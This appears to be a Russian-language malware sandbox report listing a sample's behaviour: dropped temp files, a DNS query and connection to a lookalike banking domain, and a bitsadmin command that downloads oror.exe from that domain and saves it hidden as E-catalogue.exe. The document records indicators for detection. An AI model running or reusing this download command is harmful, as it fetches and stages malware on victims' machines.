Техническая информация
- '<SYSTEM32>\bitsadmin.exe' /transfer myFile /download /priority normal https://bangkokbankth.org/oror.exe %TEMP%\E-catalogue.exe
- %WINDIR%\temp\cabd649.tmp
- %WINDIR%\temp\tard64a.tmp
- %WINDIR%\temp\cabec54.tmp
- %WINDIR%\temp\tarec55.tmp
- %WINDIR%\temp\cab28d.tmp
- %WINDIR%\temp\tar28e.tmp
- %WINDIR%\temp\cab3a9.tmp
- %WINDIR%\temp\tar3aa.tmp
- %WINDIR%\temp\cab1956.tmp
- %WINDIR%\temp\tar1957.tmp
- %WINDIR%\temp\cabd649.tmp
- %WINDIR%\temp\tard64a.tmp
- %WINDIR%\temp\cabec54.tmp
- %WINDIR%\temp\tarec55.tmp
- %WINDIR%\temp\cab28d.tmp
- %WINDIR%\temp\tar28e.tmp
- %WINDIR%\temp\cab3a9.tmp
- %WINDIR%\temp\tar3aa.tmp
- %WINDIR%\temp\cab1956.tmp
- %WINDIR%\temp\tar1957.tmp
- 'ba####kbankth.org':443
- DNS ASK ba####kbankth.org
- '<SYSTEM32>\bitsadmin.exe' /transfer myFile /download /priority normal https://bangkokbankth.org/oror.exe %TEMP%\E-catalogue.exe' (со скрытым окном)